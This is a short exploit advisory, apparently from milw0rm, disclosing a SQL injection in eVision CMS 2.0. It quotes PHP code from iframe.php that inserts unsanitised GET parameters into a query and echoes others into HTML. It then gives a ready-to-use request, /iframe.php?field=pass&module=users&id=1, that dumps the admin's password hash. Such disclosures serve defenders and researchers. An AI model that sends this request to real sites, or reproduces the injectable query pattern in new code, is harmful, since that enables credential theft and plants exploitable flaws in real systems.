--+++============================================================+++-- --+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++-- --+++============================================================+++-- [+] Author : darkjoker [+] Site : http://darkjoker.net23.net [+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz [+] Vulnerable code: 67 $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'"; 68 $result = mysql_query($sql); 69 $row = mysql_fetch_array($result); 70 71 if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; } 72 else { $div = ''; } 73 if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; } 74 else { $font = ''; } 75 76 echo ' 77 78 79 80 81 82 '.set_text($row[$_GET['field']]).' 83 84 '; [+] It prints admin's password (hashed): [+] /iframe.php?field=pass&module=users&id=1 # milw0rm.com [2009-01-30]